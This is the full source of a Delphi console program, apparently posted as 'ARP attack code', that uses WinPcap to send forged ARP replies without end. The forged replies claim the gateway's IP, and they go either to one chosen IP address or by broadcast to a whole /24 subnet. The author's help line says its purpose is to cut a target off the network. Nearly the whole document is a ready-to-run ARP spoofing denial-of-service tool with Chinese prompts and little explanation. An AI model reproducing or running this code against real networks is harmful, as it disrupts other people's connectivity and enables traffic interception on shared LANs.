DELPHI ARP攻击代码_ARP原理

program Arp;

{$APPTYPE CONSOLE}

uses

windows,IpHlpApi, IpTypes,

Packet32,WinSock,math;

const

MAC_SIZE = 6;

type

MACADDRESS = array[0 .. MAC_SIZE - 1] of UCHAR;

type

ETHERNET_HDR = packed record

Destination:              MACADDRESS;

Source:                   MACADDRESS;

Protocol:                 WORD;

end;

type

ARP_HDR = packed record

HardwareType:             WORD;

ProtocolType:             WORD;

HLen:                     UCHAR;

PLen:                     UCHAR;

Operation:                WORD;

SenderHA:                 MACADDRESS;

SenderIP:                 DWORD;

TargetHA:                 MACADDRESS;

TargetIP:                 DWORD;

end;

type

TSendData = Record

     HEther        : ETHERNET_HDR;                  //以太网头

     ARP           : ARP_HDR;                        //ARP段

end;

var

NameList : Array [0..1024] of char;

Buffer: array[0 .. 63] of Char;

StrData:array[0..10] of string;

BufferStr: String;

NameLength,i:Longword;

Num,Size: Integer;

Strs:String;

p:Padapter;

pp:Ppacket ;

Ch: Byte;

IP: DWORD;

Mac: MACADDRESS;

Gateway: DWORD ;

FComputerName,FComputerIP,CompIp,DestIP:string;

SendData: TSendData;

Ok:Boolean;

Test:String;

function IntToStr(I: DWORD): String;

begin

Str(I, Result);

end;

function StrPas(const Str: PChar): string;

begin

Result := Str;

end;

function StrToInt(const S: string): Integer;

var

E: Integer;

begin

Val(S, Result, E);

end;

function MactoStr(Mac: MACADDRESS): String;

var

ch1, ch2: Byte;

i: Integer;

begin

Result := '';

for i := 0 to MAC_SIZE - 1 do

begin

    ch1 := Mac[i] and $F0;

    ch1 := ch1 shr 4;

    if ch1 > 9 then

     ch1 := ch1 + Ord('A') - 10

    else

     ch1 := ch1 + Ord('0');

    ch2 := Mac[i] and $0F;

    if ch2 > 9 then

     ch2 := ch2 + Ord('A') - 10

    else

     ch2 := ch2 + Ord('0');

    Result := Result + Chr(ch1) + Chr(ch2);

    if i < 5 then

     Result := Result + ':';

end;

end;

function IPtoStr(IP: DWORD): String;

begin

result:=IntToStr((IP and $FF000000) shr 24 )+'.';

    result:=result+IntToStr((IP and $00FF0000) shr 16 )+'.';

     result:=result+IntToStr((IP and $0000FF00) shr 8 )+'.';

      result:=Result+IntToStr((IP and $000000FF) shr 0 );

end;

function Str2IP(s: String): DWORD;

var

i: Integer;

Index: Integer;

Digit: String;

IP: array [0 .. 4 - 1] of DWORD;

Len: Integer;

begin

//try

Index := 1;

for i := 0 to 4 - 1 do

    IP[i] := 0;                       

Len := Length(s);

for i := 0 to 4 - 1 do

begin

    Digit := '';

    while(s[Index] >= '0') and (s[Index] <= '9') and (Index <= Len) do

    begin

     Digit := Digit + s[Index];

     inc(Index);

    end;

    inc(Index);

    IP[i] := StrToInt(Digit);

end;

Result :=

    IP[0] shl 24 +

    IP[1] shl 16 +

    IP[2] shl 8 +

    IP[3] shl 0;

// except

     // Result:=0;

     // end;

end;

function IntToHex( Value : DWord; Digits : Integer ) : String;

asm      // EAX = Value

         // EDX = Digits

         // ECX = @Result

PUSH       0

ADD        ESP, -0Ch

PUSH       EDI

PUSH       ECX

LEA        EDI, [ESP+8+0Fh] // EBX := @Buf[ 15 ]

{$IFDEF SMALLEST_CODE}

{$ELSE}

AND        EDX, $F

{$ENDIF}

@@loop:

DEC        EDI

DEC        EDX

PUSH       EAX

{$IFDEF PARANOIA}

DB $24, $0F

{$ELSE}

AND        AL, 0Fh

{$ENDIF}

{$IFDEF oldcode}

{$IFDEF PARANOIA}

DB $3C, 9

{$ELSE}

CMP        AL, 9

{$ENDIF}

JA         @@10

{$IFDEF PARANOIA}

DB $04, 30h-41h+0Ah

{$ELSE}

ADD        AL,30h-41h+0Ah

{$ENDIF}

@@10:

{$IFDEF PARANOIA}

DB $04, 41h-0Ah

{$ELSE}

ADD        AL,41h-0Ah

{$ENDIF}

{$ELSE newcode}

AAM

DB $D5, $11 //AAD

ADD       AL, $30

{$ENDIF newcode}

         //MOV        byte ptr [EDI], AL

STOSB

DEC        EDI

POP        EAX

SHR        EAX, 4

JNZ        @@loop

TEST       EDX, EDX

JG         @@loop

POP        EAX       // EAX = @Result

MOV        EDX, EDI // EDX = @resulting string

CALL       System.@LStrFromPChar

POP        EDI

ADD        ESP, 10h

end;

function StrToMac(s: String): MACADDRESS;

var

i: Integer;

Index: Integer;

Ch: String;

Mac: MACADDRESS;

begin

Index := 1;

for i := 0 to MAC_SIZE - 1 do

begin

    Ch := Copy(s, Index, 2);

    Mac[i] := StrToInt('$' + Ch);

    inc(Index, 2);

    while s[Index] = ':' do

     inc(Index);

end;

Result := Mac;

end;

Function GetSubStrNum(aString:String;SepChar:String):integer;

var

      i:Integer;

      StrLen:Integer;

      Num:Integer;

begin

      StrLen:=Length(aString);

      Num:=0;

      For i:=1 to StrLen do

      If Copy(aString,i,1) = SepChar then

      Num:=Num+1;

      result:=Num;

      end;

procedure GetClientPcNameIP;

const nSize = 256;

var

       strName :PChar;

       pWsaData :WSAData;

       nHostent :PHostEnt;

       Ver       :Word;

begin

try

      Ver := MakeWord(2,0);

     if WSAStartup(Ver,pWsaData) <> 0 then exit;

        GetMem(strName,nSize);

     if GetHostName(strName,nSize) <> 0 then exit;

          FComputerName := strName;

          nHostent := GetHostByName(strName);

          FComputerIP := inet_ntoa((PInAddr((nHostent.h_addr_list)^))^);

finally

         FreeMem(strName);

end;

end;

function Split(Input: string; Deliminator: string; Index: Integer): string;

var

StringLoop, StringCount: Integer;

Buffer: string;

begin

StringCount := 0;

for StringLoop := 1 to Length(Input) do

begin

     if (Copy(Input, StringLoop, 1) = Deliminator) then

     begin

       Inc(StringCount);

       if StringCount = Index then

       begin

         Result := Buffer;

         Exit;

       end

       else

       begin

         Buffer := '';

       end;

     end

     else

     begin

       Buffer := Buffer + Copy(Input, StringLoop, 1);

     end;

end;

Result := Buffer;

end;

function GetMacByIP(Const IPAddr: string): string;

var

dwResult: DWord;

nIPAddr: integer;

nMacAddr: array[0..5] of Byte;

nAddrLen: Cardinal;

WSAData: TWSAData;

begin

if WSAStartup($101, WSAData)=-1 then Exit;

nIPAddr := INet_Addr(PChar(IPAddr));

if nIPAddr = INADDR_NONE then exit;

nAddrLen := 6;

dwResult:= 1;

try

     dwResult := SendARP(nIPAddr, 0, @nMacAddr, nAddrLen);

except end;

if dwResult = 0 then

     result := (IntToHex(nMacAddr[0], 2) + ':' +

       IntToHex(nMacAddr[1], 2) + ':' +

       IntToHex(nMacAddr[2], 2) + ':' +

       IntToHex(nMacAddr[3], 2) + ':' +

       IntToHex(nMacAddr[4], 2) + ':' +

       IntToHex(nMacAddr[5], 2))

else

     result := '';

WSACleanup;

end;

procedure MyNetwork(Ms: string;var IP: DWORD;var Mac: MACADDRESS;var Gateway: DWORD);

var

i: Integer;

p, pAdapterInfo: PIP_ADAPTER_INFO;

uOutBufLen: ULONG;

dwRes: DWORD;

begin

pAdapterInfo := nil;

uOutBufLen := 0;

dwRes := GetAdaptersInfo(pAdapterInfo, uOutBufLen);

if dwRes = ERROR_BUFFER_OVERFLOW then

begin

    GetMem(pAdapterInfo, uOutBufLen);

    dwRes := GetAdaptersInfo(pAdapterInfo, uOutBufLen);

end;

if dwRes <> ERROR_SUCCESS then

begin

    exit;

end;

p := pAdapterInfo;

while p <> nil do

begin

    if Pos(String(p^.AdapterName), Ms) <> 0 then

     break;

    p := p^.Next;

end;

try

if p <> nil then

begin

    IP := Str2IP(p^.IpAddressList.IpAddress.S);

    for i := 0 to MAC_SIZE - 1 do

     Mac[i] := p^.Address[i];

    Gateway := Str2IP(p^.GatewayList.IpAddress.S);

end;

except

     end;

FreeMem(pAdapterInfo);

end;

procedure Help;

begin

WriteLn('小小的程序.实验一下ARP欺骗.让个IP.让其断网罢了.运行环境需要Winpcap.作者:Open');

end;

label

     start,print;

begin

    Help ;

    NameLength := 1024;

    ZeroMemory(@NameList,1024);

    PacketGetAdapterNames(NameList,@NameLength);

    for i:=0 to NameLength-1 do begin

    if ((NameList[i]=#0) and (NameList[i+1]=#0))then

          break

        else

        if ((NameList[i]=#0) and (NameList[i+1]<>#0))then

          NameList[i]:=char(',');

        end;

         Strs:=StrPas(NameList);

         Num:=GetSubStrNum(Strs,',');

         GetClientPcNameIP;

       for i:=0 to Num do begin

       StrData[i]:= Split(Strs,',',i+1);

       MyNetwork (StrData[i],ip,mac,Gateway);

       CompIp:=iptostr(ip);

       if CompIp = FComputerIP then begin

        Strs:= StrData[i];

        Break;

        end;

       end;

      WriteLn('Ethernet:'+strs);

      WriteLn('IP:'+iptostr(ip));

      WriteLn('Mac:'+MacToStr(Mac));

      WriteLn('Gateway:'+iptostr(Gateway));

      WriteLn('1.攻击指定IP     2.攻击一个C段');

print:

      Write('请选择:');

      Readln(Test);

      if (Test <> '1') and (Test <> '2' )then begin

      write('你的选择有误 ');

      goto print;

     end;

    ZeroMemory(@SendData,sizeof(TSendData));

    if Test = '1' then begin

start:

      write('请输入你要攻击的IP:');

      Readln(DestIP);

      if GetSubStrNum(DestIP,'.')<>3 then begin

       WriteLn('输入不正确');

       goto start ;

      end

else begin

      SendData.HEther.Destination:= StrToMac(GetMacByIP(DESTIP) );

       end ;

end;

if Test = '2' then

SendData.HEther.Destination:= StrToMac('FF:FF:FF:FF:FF:FF') ;

    //

    ///SendData.HEther.Destination:= StrToMac(GetMacByIP(DESTIP) );

    for i := 0 to MAC_SIZE - 1 do

    SendData.HEther.Source[i]:=30+Random(10)-1;

    SendData.HEther.Protocol:=$0608;

    SendData.ARP.HardwareType:=$0100;

    SendData.ARP.ProtocolType:=$08;

    SendData.ARP.HLen:=$06;

    SendData.ARP.PLen:=$04;

    SendData.ARP.Operation:=$0200;

    SendData.ARP.SenderHA:=StrToMac('00:00:00:00:00:00');

    SendData.ARP.SenderIP:=inet_addr(PChar(iptostr(Gateway)));

    p:= PacketOpenAdapter(pchar(strs));

    if (p=nil)or (p.hFile=INVALID_HANDLE_VALUE) then Exit;

    pp:=PacketAllocatePacket;

    PacketInitPacket(pp, @SendData,SizeOf(SendData));

if Test = '1' then begin

WriteLn('正在对IP:' + DestIP + '进行ARP');

end

else begin

    WriteLn('正在一个C段进行ARP');

    end;

    OK:=True;

     while ok do begin

    PacketSendPacket(p, pp, true);

    if i >= 10 then begin

    Write('>');

    i := 0 ;

    end;

    i := i + 1 ;

    Sleep(50);

    end;

    PacketFreePacket(pp);

    PacketCloseAdapter(p);

end.